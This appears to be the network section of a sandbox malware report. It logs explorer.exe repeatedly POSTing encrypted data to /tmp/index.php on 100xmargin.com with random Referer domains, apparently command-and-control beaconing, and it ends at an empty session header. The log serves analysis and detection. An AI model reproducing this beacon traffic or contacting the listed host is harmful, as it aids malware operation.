Aug 19, 2024 09:28:17.764915943 CEST	484	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.0 Date: Mon, 19 Aug 2024 07:28:17 GMT Content-Type: text/html; charset=utf-8 Connection: close Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d [TRUNCATED] Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
9	192.168.2.4	49746	189.163.89.217	80	2580	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Aug 19, 2024 09:28:17.773426056 CEST	285	OUT	POST /tmp/index.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://lxirtptkcykkr.org/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 361 Host: 100xmargin.com
Aug 19, 2024 09:28:17.773454905 CEST	361	OUT	Data Raw: 3b 6e 56 18 87 ca 1b 27 ac de c2 03 07 74 0c be 09 0a cb 96 6d 03 e5 62 7d 0c 78 e1 45 c3 c7 62 e9 2d c3 2f 06 1f 24 6c ec ed 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 1b 1d c7 41 20 ff 2d 5b 0d 6b 2c 90 f5 76 0b 75 63 00 b8 a3 Data Ascii: ;nV'tmb}xEb-/$l? 9Yt M@NA -[k,vucM8rfES`zKLzoS&/\|3N]XzN=5BWD4Zb9x(CPpl,%.
Aug 19, 2024 09:28:18.847256899 CEST	137	IN	HTTP/1.1 200 OK Server: nginx/1.26.0 Date: Mon, 19 Aug 2024 07:28:18 GMT Content-Type: text/html; charset=utf-8 Connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
10	192.168.2.4	49747	189.163.89.217	80	2580	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Aug 19, 2024 09:28:18.876336098 CEST	284	OUT	POST /tmp/index.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://dajceptfmjkh.net/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 204 Host: 100xmargin.com
Aug 19, 2024 09:28:18.876364946 CEST	204	OUT	Data Raw: 3b 6e 56 18 87 ca 1b 27 ac de c2 03 07 74 0c be 09 0a cb 96 6d 03 e5 62 7d 0c 78 e1 45 c3 c7 62 e9 2d c3 2f 06 1f 24 6c ec ed 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 1b 1d c7 41 20 ff 2d 5b 02 6b 2c 90 f5 76 0b 75 4a 3d ad e8 Data Ascii: ;nV'tmb}xEb-/$l? 9Yt M@NA -[k,vuJ=#Xks5]B=QAb^q!+^5j3OGkJ\|?1),c?*)_
Aug 19, 2024 09:28:19.948719978 CEST	137	IN	HTTP/1.1 200 OK Server: nginx/1.26.0 Date: Mon, 19 Aug 2024 07:28:19 GMT Content-Type: text/html; charset=utf-8 Connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
11	192.168.2.4	49748	189.163.89.217	80	2580	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Aug 19, 2024 09:28:19.957370996 CEST	285	OUT	POST /tmp/index.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://riwgwvjrbnmwo.net/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 293 Host: 100xmargin.com
Aug 19, 2024 09:28:19.957400084 CEST	293	OUT	Data Raw: 3b 6e 56 18 87 ca 1b 27 ac de c2 03 07 74 0c be 09 0a cb 96 6d 03 e5 62 7d 0c 78 e1 45 c3 c7 62 e9 2d c3 2f 06 1f 24 6c ec ed 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 1b 1d c7 41 20 ff 2d 5b 03 6b 2c 90 f5 76 0b 75 70 41 d7 e3 Data Ascii: ;nV'tmb}xEb-/$l? 9Yt M@NA -[k,vupAcGpYMm5k7<2tG5c&aQK6eNW;*eB #w\|M\oef"3O5L"bLNM]"oE9q3Sa
Aug 19, 2024 09:28:21.024168015 CEST	484	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.0 Date: Mon, 19 Aug 2024 07:28:20 GMT Content-Type: text/html; charset=utf-8 Connection: close Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d [TRUNCATED] Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
12	192.168.2.4	49749	189.163.89.217	80	2580	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Aug 19, 2024 09:28:21.032207966 CEST	284	OUT	POST /tmp/index.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://nlcihkcpqxmi.com/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 221 Host: 100xmargin.com
Aug 19, 2024 09:28:21.032233953 CEST	221	OUT	Data Raw: 3b 6e 56 18 87 ca 1b 27 ac de c2 03 07 74 0c be 09 0a cb 96 6d 03 e5 62 7d 0c 78 e1 45 c3 c7 62 e9 2d c3 2f 06 1f 24 6c ec ed 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 1b 1d c7 41 20 ff 2d 5b 00 6b 2c 90 f5 76 0b 75 4c 3a da be Data Ascii: ;nV'tmb}xEb-/$l? 9Yt M@NA -[k,vuL:phie`C';~%plzo[ZF(M&++w<Jq}i<KgW8$wO
Aug 19, 2024 09:28:22.108818054 CEST	206	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.0 Date: Mon, 19 Aug 2024 07:28:21 GMT Content-Type: text/html; charset=utf-8 Connection: close Data Raw: 00 00 d8 80 d7 bd 9d d9 a1 98 be 23 cd c5 88 81 99 8b 5c 36 06 7f 55 e7 39 04 fc ea 48 e6 8e ac a9 2d 99 61 c2 e8 6e 59 1a 82 9e 8a c0 70 9b 37 18 12 98 07 99 16 76 5a 57 ef d5 7f e5 7c Data Ascii: #\6U9H-anYp7vZW\|

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
13	192.168.2.4	49751	189.163.89.217	80	2580	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Aug 19, 2024 09:28:26.654015064 CEST	288	OUT	POST /tmp/index.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://ykdamwdnhbwpknpg.org/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 227 Host: 100xmargin.com
Aug 19, 2024 09:28:26.654037952 CEST	227	OUT	Data Raw: 3b 6e 56 18 87 ca 1b 27 ac de c2 03 07 74 0c be 09 0a cb 96 6d 03 e5 62 7d 0c 78 e1 45 c3 c7 62 e9 2d c3 2f 06 1f 24 6c ec ed 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 1b 1d c7 41 20 ff 2c 5b 00 6b 2c 90 f4 76 0b 75 75 01 eb 95 Data Ascii: ;nV'tmb}xEb-/$l? 9Yt M@NA ,[k,vuunKquSx5Vf,2hB@^'. d+[0xN&M]_3}WsNQFkoF_,z
Aug 19, 2024 09:28:27.744632006 CEST	484	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.0 Date: Mon, 19 Aug 2024 07:28:27 GMT Content-Type: text/html; charset=utf-8 Connection: close Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d [TRUNCATED] Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
14	192.168.2.4	49752	189.163.89.217	80	2580	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Aug 19, 2024 09:28:27.825930119 CEST	285	OUT	POST /tmp/index.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://snmklddnlivyu.net/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 262 Host: 100xmargin.com
Aug 19, 2024 09:28:27.825963020 CEST	262	OUT	Data Raw: 3b 6e 56 18 87 ca 1b 27 ac de c2 03 07 74 0c be 09 0a cb 96 6d 03 e5 62 7d 0c 78 e1 45 c3 c7 62 e9 2d c3 2f 06 1f 24 6c ec ed 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 1b 1d c7 41 20 ff 2d 5b 01 6b 2c 90 f5 76 0b 75 3d 0d e7 87 Data Ascii: ;nV'tmb}xEb-/$l? 9Yt M@NA -[k,vu=JirPwtL=_\|=1i[JD_\|AU'r5#SK sso;EBipdSf#f,]!=!
Aug 19, 2024 09:28:28.890353918 CEST	484	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.0 Date: Mon, 19 Aug 2024 07:28:28 GMT Content-Type: text/html; charset=utf-8 Connection: close Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d [TRUNCATED] Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
15	192.168.2.4	49753	189.163.89.217	80	2580	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Aug 19, 2024 09:28:28.898917913 CEST	284	OUT	POST /tmp/index.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://dlmvqfjbkpla.org/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 116 Host: 100xmargin.com
Aug 19, 2024 09:28:28.898941040 CEST	116	OUT	Data Raw: 3b 6e 56 18 87 ca 1b 27 ac de c2 03 07 74 0c be 09 0a cb 96 6d 03 e5 62 7d 0c 78 e1 45 c3 c7 62 e9 2d c3 2f 06 1f 24 6c ec ed 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 1b 1d c7 41 20 ff 2d 5b 06 6b 2c 90 f5 76 0b 75 57 29 bd fe Data Ascii: ;nV'tmb}xEb-/$l? 9Yt M@NA -[k,vuW)e\@L vRQ5mR
Aug 19, 2024 09:28:29.965559959 CEST	137	IN	HTTP/1.1 200 OK Server: nginx/1.26.0 Date: Mon, 19 Aug 2024 07:28:29 GMT Content-Type: text/html; charset=utf-8 Connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
16	192.168.2.4	49754	189.163.89.217	80	2580	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Aug 19, 2024 09:28:29.977267981 CEST	285	OUT	POST /tmp/index.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://tmkcjriymiwrj.org/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 301 Host: 100xmargin.com
Aug 19, 2024 09:28:29.977318048 CEST	301	OUT	Data Raw: 3b 6e 56 18 87 ca 1b 27 ac de c2 03 07 74 0c be 09 0a cb 96 6d 03 e5 62 7d 0c 78 e1 45 c3 c7 62 e9 2d c3 2f 06 1f 24 6c ec ed 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 1b 1d c7 41 20 ff 2d 5b 07 6b 2c 90 f5 76 0b 75 38 39 a5 8c Data Ascii: ;nV'tmb}xEb-/$l? 9Yt M@NA -[k,vu89r"XEH0N+*gR\@K{=;q{\FS2lqb@RBJr)!<hwNX\|uV@XTR
Aug 19, 2024 09:28:31.106734991 CEST	185	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.0 Date: Mon, 19 Aug 2024 07:28:30 GMT Content-Type: text/html; charset=utf-8 Connection: close Data Raw: 00 00 d8 80 d7 bd 9d d9 a1 98 be 23 cd c5 88 81 d0 9e 5c 76 12 7e 54 e0 37 00 fd ff 4f bd 9f f1 a3 23 db 20 c2 b6 26 42 10 Data Ascii: #\v~T7O# &B

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
17	192.168.2.4	49755	189.163.89.217	80	2580	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Aug 19, 2024 09:28:31.165889025 CEST	283	OUT	POST /tmp/index.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://prlieqcsxkp.net/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 313 Host: 100xmargin.com
Aug 19, 2024 09:28:31.165904999 CEST	313	OUT	Data Raw: 3b 6e 56 18 87 ca 1b 27 ac de c2 03 07 74 0c be 09 0a cb 96 6d 03 e5 62 7d 0c 78 e1 45 c3 c7 62 e9 2d c3 2f 06 1f 24 6c ec ed 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 1b 1d c7 41 20 ff 2d 5b 04 6b 2c 90 f5 76 0b 75 62 1e c5 f3 Data Ascii: ;nV'tmb}xEb-/$l? 9Yt M@NA -[k,vubZCar\{I!R4noR!7;C2ZcU1Tg";-IeA u1\|W$v"c~@RM"vZT&p
Aug 19, 2024 09:28:32.230703115 CEST	484	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.0 Date: Mon, 19 Aug 2024 07:28:32 GMT Content-Type: text/html; charset=utf-8 Connection: close Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d [TRUNCATED] Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
18	192.168.2.4	49756	189.163.89.217	80	2580	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Aug 19, 2024 09:28:32.239377022 CEST	283	OUT	POST /tmp/index.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://osgexwvtdnb.org/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 289 Host: 100xmargin.com
Aug 19, 2024 09:28:32.239394903 CEST	289	OUT	Data Raw: 3b 6e 56 18 87 ca 1b 27 ac de c2 03 07 74 0c be 09 0a cb 96 6d 03 e5 62 7d 0c 78 e1 45 c3 c7 62 e9 2d c3 2f 06 1f 24 6c ec ed 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 1b 1d c7 41 20 ff 2d 5b 05 6b 2c 90 f5 76 0b 75 66 42 c3 82 Data Ascii: ;nV'tmb}xEb-/$l? 9Yt M@NA -[k,vufBayi9`^Q3\|YA4~A2@HiJX(`]X@_c3]f?_bD=^s7ynnl$0OA%I;
Aug 19, 2024 09:28:33.315583944 CEST	484	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.0 Date: Mon, 19 Aug 2024 07:28:33 GMT Content-Type: text/html; charset=utf-8 Connection: close Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d [TRUNCATED] Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
19	192.168.2.4	49757	189.163.89.217	80	2580	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Aug 19, 2024 09:28:33.325525045 CEST	284	OUT	POST /tmp/index.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://rklgwxcehosl.com/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 183 Host: 100xmargin.com
Aug 19, 2024 09:28:33.325548887 CEST	183	OUT	Data Raw: 3b 6e 56 18 87 ca 1b 27 ac de c2 03 07 74 0c be 09 0a cb 96 6d 03 e5 62 7d 0c 78 e1 45 c3 c7 62 e9 2d c3 2f 06 1f 24 6c ec ed 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 1b 1d c7 41 20 ff 2d 5b 1a 6b 2c 90 f5 76 0b 75 46 02 a3 94 Data Ascii: ;nV'tmb}xEb-/$l? 9Yt M@NA -[k,vuFI9oOdJ>P?iy}1 JP,"LyFp[%d*ia;#
Aug 19, 2024 09:28:34.392292976 CEST	484	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.0 Date: Mon, 19 Aug 2024 07:28:34 GMT Content-Type: text/html; charset=utf-8 Connection: close Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d [TRUNCATED] Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
20	192.168.2.4	49758	189.163.89.217	80	2580	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
